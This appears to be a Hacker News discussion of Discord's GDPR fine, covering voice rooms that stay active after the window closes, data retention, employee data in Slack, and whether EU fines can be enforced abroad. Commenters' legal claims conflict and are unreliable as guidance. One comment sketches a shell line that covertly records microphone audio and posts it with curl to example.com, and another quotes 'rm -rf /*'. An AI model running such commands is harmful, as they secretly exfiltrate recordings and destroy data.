It seems like they didn't even consider any of the real issues. Things like deleted messages appearing in requests for your data, leaving a chat (or deleting your account while you are in a chat) with a deleted user not deleting the messages and uploads even though nobody is supposed to be able to re-join it, people getting banned for using scripts to mass-delete their own posts and in some cases getting banned for manually deleting their own posts "too fast", "right to be forgotten" requests being ignored, etc.

I wonder how this is supposed to work with workplace apps such as Slack.

Assume I am leaving my job and want my personal information removed from this third-party service (Slack). They say [1] "Primary Owners of a workspace or org must contact Slack to request deletion of a deactivated member's profile information.". What if I contact the "Primary Owner" before leaving my job and they ignore my request, or if I've already left and don't know how to contact them or who they are? Why can't I simply request that my personal information be removed from a completely third-party American company's database?

I thought about this out loud before, and got the response "If you are using company account, company owns the data. The data produced during company time is company's property. Company has to request for deletion. Slack is right about it."

That made me ask more questions:

- Is my full name, birth date, telephone number, job and other details Slack collects company property?

- Can they also sell this to other third parties, along with my social security number, which the company also collected during business hours?

- Is Slack also free to sell this data to third parties?

- Does GDPR protect your personal information ONLY if you gave it away during your free / unemployed time using your personally owned devices and ONLY to services you have admin access to?

[1] https://slack.com/help/articles/360000360443-Delete-profile-...

You could ask the local DPA to look at your former employer (and then sue them if they decide to ignore you). Companies have been fined for lax handling of employee data.

Slack is likely trying to operate under one of the attempts to replace the invalidated "privacy shield" framework (the current attempt is summarized here https://www.tadpf.eu/) for their European enterprise customers, and a part of this is having contracts prohibiting Slack from handing out the data to any 3rd party, but your relationship here is with your former employer and not Slack.

The Schrems rulings are a bit of a problem for Slack here, but that's not because Slack is necessarily violating the GDPR directly but because the US does not live up to the EU's standards for what a modern democracy is allowed to subject people to in terms of protection against "unreasonable search and seizure" (this term actually comes from the Fourth Amendment of the US Constitution, but somehow the US courts don't think it applies to foreign persons or digital records held by cloud companies).

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room.

> DISCORD's behavior is different and may lead to users being heard by other members in the voice room when they thought they had left.

Yeah, that's bad

I'm not such a big fan of password policies but 6 characters with no rate-limiting seems bad as well

I'm not fond of regulatory agencies defining what constitutes an acceptable password policy.

Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth.

How is this UI design? Wouldn't this fall under UX or just basic functionality? I press X, program close. If I want it minimized I press the minimize button.

How discord works is the expected behaviour for many users, including myself. I do not want to minimize the window (keeping it in the task bar), I want to close the window, while keeping the background worker running.

My experience with applications that show a notification/tray icon is that about 80% of them do not shut down when closing the main window. And the ones that don't follow this pattern by default can usually be configured to work this way.

Microsoft has applications which follow the same pattern. For example the Anti-Virus runs in the background and indicates its status via notification/tray icon. Opening or closing the settings window has no effect on its operation.

I don’t think the background worker is the problem. It’s the fact that the user remains in a call, with their microphone hot, potentially against their expectation

"X" hasn't meant end the process for over 20 years.

In 2022, it could very well be the better choice for most users to not end a voice call just because they clicked the "X" to get rid of the window. Just like what Skype, other Voip services, and most chat services have done forever.

This ruling is a bit disappointing.

That's most of my life and I've always associated X with end process. Maybe I'm the odd one out.

The classic use case is minimize to tray vs minimize to taskbar. Winamp even had these two different modes in like 1999.

Winamp is:

1. Making it obvious that it's still active (hard to miss that a music player is... playing music)

2. Not listening to your microphone

I'm even less a fan of discord having awful options there.

Because this is beyond UX and password policy, it's about behaviour that is bad

> Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth.

There are probably a bunch of regulations that dictate on what is in your car's cabin and how they work.

Cars are tons of metal moving at very high speeds under manual control, so I can understand why that would need greater regulatory scrutiny.

Their only product is a software whose background process scanner can never be disabled.

That's a red flag to me already.

So if I’m an American company and have no offices in Europe and ignore GDPR for my free customers, what happens? Will I get arrested by the Polizei when I land in Berlin? Will the US force me to pay these fines?

Basically, if you do business in the EU (have customers there) then you'll be held accountable.

Or if you have non-paying users. Commerce is not a requirement for being subject to the GDPR.

My suspicion is that only companies with significant business interests in the EU are targeted, investigated and fined. Otherwise they could just ignore it.

You sure? Lots of small fish are caught in this net.


Yes, the European Commission will collaborate with international governments to impose fines.

No, they will not. If you're a company with a substantial enough userbase in their country to be investigated under their regulations, then failing to follow them and/or ignoring fines will most likely result in them preventing your services from being accessed in their country.

Which international governments? Why would the US agree to impose an EU fine, and under what legal basis?

Why would European countries extradite american criminals to the US? Because we established a trust in each other and want to keep it that way for both sides benefits.

This is a poor comparison. Extradition treaties exist and contain specific legal obligations. It is not based on trust and there are several pairs of countries that do not have specific extradition treaties.

> treaties [...] not based on trust

How are these treaties enforced? All international treaties are ultimately based on trust. There is no higher authority, only elective councils of and voluntary commitment to procedures (a.k.a. promises) by sovereign states.

Specifically not even these formal promises have been given by e.g. the United States of America which to this day has signed but never ratified either the VCLT[1] or the VCLTIO[2], so is figuratively giving a lukewarm "let's see about the convenience of that when it comes up".

1: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o...

2: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o...

I think, de facto, nothing will happen. But if you start to evade taxes on your foreign paying customers, and you avoid local regulations, then you expose yourself to a risk.

Probably nothing happens. I doubt they're going to spend time investigating a company that doesn't do any business in Europe, when there's a very long list of bigger companies that do operate here and break our privacy and sell our data.

If the company doesn't do any business in Europe it has no users in Europe, therefore it doesn't have to comply with the GDPR at all.

GDPR is extra-territorial and its rights apply to EU citizens wherever they are in the world

if an EU user is in the US ON HOLIDAY! and they're using your service, you're subject to the GDPR

(in theory)

No. GDPR isn't tied to citizenship. EU citizens & residents are not covered by GDPR when they are outside of EU unless member state's law applies by virtue of public international law (https://gdpr-info.eu/art-3-gdpr/).

A somewhat more unclear situation is if a non-resident is visiting the EU and uses services from their home country.

like most EU law it's badly written, but it states "to such data subjects in the Union"

given "within the Union" is used separately in the next sub-article to mean physically located within, it's arguable that "in the Union" could mean citizen of

Seizing income originating from Europe, seizing payments to European companies seem obvious steps.

> Will I get arrested by the Polizei when I land in Berlin?

Maybe also this.

> Will the US force me to pay these fines?

I am also curious.

My question as well. Can a non-EU company simply refuse to pay, and also refuse to block users from the EU? I wonder if the EU would decide to block access to the foreign service as a result. It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

> It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

This happened a long time ago. And it was started by the US, I'm quite sure.

More than that, the American way to manage the "global network" is basically to impose US laws everywhere in the world.

You can receive DMCA notices outside the US, for example.

Or even crazier: https://en.wikipedia.org/wiki/United_States_v._Elcom_Ltd.

Someone arrested, in the US, for a "crime" in another country, that wasn't even a crime in his country.

> The case raised some concerns of civil rights and legal process in the United States, and ended in the charges against Sklyarov dropped and Elcomsoft ruled not guilty under the applicable jurisdiction.

So it's an example of "law enforcement can and sometimes do illegally arrest / cause other issues unfairly", but not really a good example of a law being imposed outside the country which made that law.

That's just an egregious example, but there were also literal international trade treaties where the US basically imposed adoption of the DMCA as a condition.

Also the fact that many major tech companies are American means that US laws are basically enforced on all of their users, which is super crazy.

Including stuff like...


> The CLOUD Act primarily amends the Stored Communications Act (SCA) of 1986 to allow federal law enforcement to compel U.S.-based technology companies via warrant or subpoena to provide requested data stored on servers regardless of whether the data are stored in the U.S. or on foreign soil.

This includes foreign based subsidiaries!

So if the US Gov decides that Facebook needs to give something over, everything and everyone owned by Facebook, everywhere around the world, needs to comply. So Facebook Zambia needs to hand over the data to Facebook US. On paper there are some protections, but I'd really, really want to see how well they're enforced (I doubt it).

It's so bad cloud providers have pages about it:


Where they basically say: "yeah, it's true, we'll fight in a court of law on your behalf, because otherwise a huge chunk of you in other countries would never use us".

> the company has complied with this obligation under the GDPR during the procedure, as it now has a written data retention policy, which includes deleting accounts after two years of user inactivity

I find this interpretation of the GDPR surprising. Reviewing article 5.1.e there isn't any mention of timelines or any other definition of "necessary".

As a user, I wouldn't want my account blown away just because I haven't logged in for a while.

If this was e.g., an advertiser I don't have a direct relationship with, then yeah, purge that data! But data retention is a core of my relationship with Discord, so I want that data kept around.

"..because I haven't logged in for a while".

That is a misrepresentation of the ruling.

2.4 million accounts not used in the last 3 years. This isn't "a while" it is a reasonable amount of time for a company to assume that someone doesn't want you to keep their data any longer unless they still have some other relationship with you or have your consent to keep the data stored until you explicitly delete it.

The regulations are to strike a balance between the needs of the business and the needs of the individual where the individual's privacy should generally win over the desires of the business.

I don't feel it's misrepresentative because I've gone 2-3 year spans without logging into plenty of services, and I expected my data to be there when I returned.

I've had companies email me saying "log in or we'll delete your inactive account". That's a compromise I can accept.

This article doesn't specify whether Discord does this. I'm also curious whether that practice is required under the GDPR, which the article doesn't specify either.

Would GDPR still apply if discord stored all personal data on other p2p clients?

Yes. GDPR is not focused on storage only, but on data handling as a whole. No matter where the data is stored, it's still collected and handled by Discord, thus they are responsible for what they do with it.


With all due respect 800.000 is a moderate amount looking at some awards in the consumer space in the US considering that we are looking here at a situation where eavesdropping on other people in the privacy of their homes is involved.

They could simply warn the company if they thought that would really be a problem. Fining 800k is ridiculous. If they can do this, they can attack anyone with a similar reasoning, which effectively turns GDPR into a weapon.

Yeah, 800k might not be much, but the ideology is the problem here, not the amount.

The amount of the fine is explained in the bulletin you are commenting upon:

"The amount of the fine was decided regarding the breaches identified, the number of people concerned, but also taking into account the efforts made by the company throughout the procedure to reach compliance and the fact that its business model is not based on the exploitation of personal data."

So evidently there was a dialog with the company during which they remedied much of the fault. Isn't that exactly the sort of approach you'd want from a regulator?

> It's just a "weapon" by the EU to attack any company they want. I'm pretty much sure if I made a hello world program in C, they'd find a clever way of fining me.

Not so. Your hello world in C would be just fine. Only if you track data of users that happen to live in the EU. Don't track and you absolutely will not violate GDPR.

Discord broke the law in France and gets fined according to the laws in France.

The flagged issues could have been easily avoided by having a proper GDPR trained lawyer review the service and suggest changes.

I think GDPR being a weapon to attack companies is a good thing.

I've always thought that the bad aspect of GDPR is that it's General. We have in Slovenia a strict law about privacy and personal data protection. Companies with Slovene customers had to implement country specific notices and contracts, but GDPR made that easier. Especially for companies.

That's how I viewed it; as a legislation that allows companies to harvest user data easily and that's the main point why I was against it.

This comment sort of opened my mind a bit, now the same central legislation can also be used for the benefit of the people, since a legislation enforcement agency does not have to know so much regulation to defend user data. Though on the other hand, the GDPR is pretty long, much longer than Slovenian law (we didn't implement GDPR yet, SI is currently paying fees for not implementing it).

Note: Big AFAIK -- law is really not something I understand, please correct me or add your opinion.

Can you explain a bit more? What's the problem here?

EU being able to attack any developer by making up a GDPR excuse and fine them as they want is the problem here.

How are they even making things up here? If you read through the entire thing they have a very valid case against Discord, ranging from the UX being confusing (i.e. "data protection by default") to actually storing the data they are not allowed to (i.e. illegally).

If you operate in a jurisdiction you operate by that jurisdiction's laws. Do you think European companies don't have to abide by US laws when operating in the US?

That would be a problem. However, that is not what happened.

Discord (the company) was fined for multiple breaches of the GDPR regulation.

This is the reason why GDPR is something good.

Developers are not above the law. Companies are definitely not above the law, considering that the law is an impediment to their functioning and not something they will fight for.

The reign of super-large companies is a threat to democracy, because a democracy is made for its citizens; a company is a tool and should remain under control of society. Why can companies decide how much taxes they pay ? Why can they decide where they pay them ? How can they be so powerful as to decide that breaking society's will is merely a fine, and is taken into account in the budget ? This is ridiculous. The companies are not citizens, they do not need to be cajoled.

> if I made a hello world program in C, they'd find a clever way of fining me

Last time I checked, Hello World does not contain any internet connection code, let me know an example of C hello world that grabs your microphone input then sends it over the internet. Probably would be a single Linux command line job.

Something like:

    nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done & 

Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere?

Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to just be a weaponized law for monetary gain.

> that's enough for a GDPR violation I guess?

No, you would also need to run on computers of people not understanding what is going on.

In the same way as running

> rm -rf /*

on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.

Did the users choose to install the Discord app (or run a random command?)

How are you supposed to confirm "user understanding"?

Does the program need to require a tutorial/training before it's being used?

A user's ignorance shouldn't be a software distributor's problem.

If the discord app didn't have a system tray, and hid its process from the Process List some way, maybe you have a point - this is just ignorance across the board.

I think if you are doing the "close is actually not killing the app" thing, you should ensure the user is aware the app is still recording. Some apps will show a recording thingy on the screen or it will tell you before closing and you need to agree.

I don't have the time to test this, but if it is true that you close the app and it still continues recording, then this is bad UX and the company should have prioritized fixing this instead of adding even more crap. Maybe some good practices would come from this.

Doesn't it show a system tray icon? (I don't use discord on Windows, or a system tray myself) - is a system tray icon not adequate? I believe it would show 24/7 wouldn't it?

I am not sure, it won't be enough IMO if the icon in the Tray is not changing to a clear Recording icon.

It would be like on my phone the big red End Call button would not end the call, just minimize the app and put a small gray icon on the top-bar section.

The system tray icon turns into a generic circle that nobody would associate with Discord unless they tried clicking it.

Windows has also been hiding all system tray icons for over 2 decades at this point, unless the user specifically unhides that application.

> A user's ignorance shouldn't be a software distributor's problem.

Deliberately causing user's ignorance should be a software distributor's problem.

I'm an EU citizen and support the GDPR. But it's only a question of time before the US will interpret these fines as an undeclared trade war and make up the legal framework to do retaliatory strikes against EU tech companies.

Borders and tariffs will be the long-term future of the Internet.

Given that EU companies are also getting fines, not only foreign ones, this interpretation would be silly.

The real trade war is all of the Cloud act chicanery https://news.ycombinator.com/item?id=33562182

I should clarify that anyone under fire regarding Schrems II either needs to convince an EU member state's court that the Cloud Act is unlikely to result in GDPR data protection issues, or that the US has no way of obtaining that information in the first place (eg. no US corporation or persons have access to EU citizen data).

Well, the US already has a lot of restrictions on companies that want to do business in dollars and not just on Internet companies.

See https://www.justice.gov/opa/pr/bnp-paribas-agrees-plead-guil...

This is a case of trade with countries under embargo.

One of the main uses of internet surveillance was trade (e.g. Boeing vs. Airbus deals).

I believe the US Department of Justice has the right structure to make this kind of fines; part of the fines goes to fund the Department of Justice.

The GDPR is fully within the remits of existing trade agreements and does not violate US constitutional law, so as long as the EU is not selectively targeting US companies (and there is no evidence of that being the case), it's going to take a lot of crazy politicians and some tearing up of bilateral trade and cooperation agreements for the American authorities to take any action other than assisting the EU in collecting fines from American companies.

There's nothing new about companies enforcing their existing laws on imported goods and services, and the EU-US free trade agreement already contains clauses where both parties have to assist each other if a company is trying to evade those rules. The only thing new is that the regulators are now considering digital services to cross the border when there is money flowing the other way.

If the US were going to raise a stink they would have done so when the EU kept doubling MS's antitrust fine until MS eventually paid up; issuing GDPR fines to Discord that are smaller than what smaller European companies have been fined ain't going to be an issue for the transatlantic trade relationships. Especially as GDPR style rules are being proposed at the state level in the US.

Region locking of copyrighted material is where the real blocks in content are going to come into play (as they already have), but that is a whole different can of mud.

I guess their assumption is that US wouldn't have that many options whom to retaliate to. Who would they fine? Spotify, maybe? Who else?

If regulating foreign companies is an undeclared trade war, could the US government please give Volkswagen its billions of dollars back?

Eh, maybe, but also maybe not.

Five states have passed their own privacy laws, with one in effect now and others coming online soon.

If this practice continues, and it likely will, it will soon become completely unmanageable for US tech companies to keep up with the myriad of state privacy laws.

At that point the federal government will likely pass a federal privacy law, which supersedes all the state privacy laws. And once we have a federal privacy law, it will likely be designed to at least be somewhat compatible with GDPR.

So, I don’t see the US going to war over this issue. I think the political winds are drifting in the other direction, and the US will follow Europe on this. Eventually.

Good. More borders and tariffs (AND TAXATION, let me add) are definitely needed. Internet should contribute to a greater good, not enable transnational companies, tax evasion and data theft.

If the US chooses to interpret the GDPR that way, despite the fact that some significant receivers of fines are European themselves (like H&M, Vodafone, two Italian energy and telecoms, Marriott and British Airways) then that would just show that American tech is an extended arm of the American government and in that case we should prioritize our sovereignty in the EU.
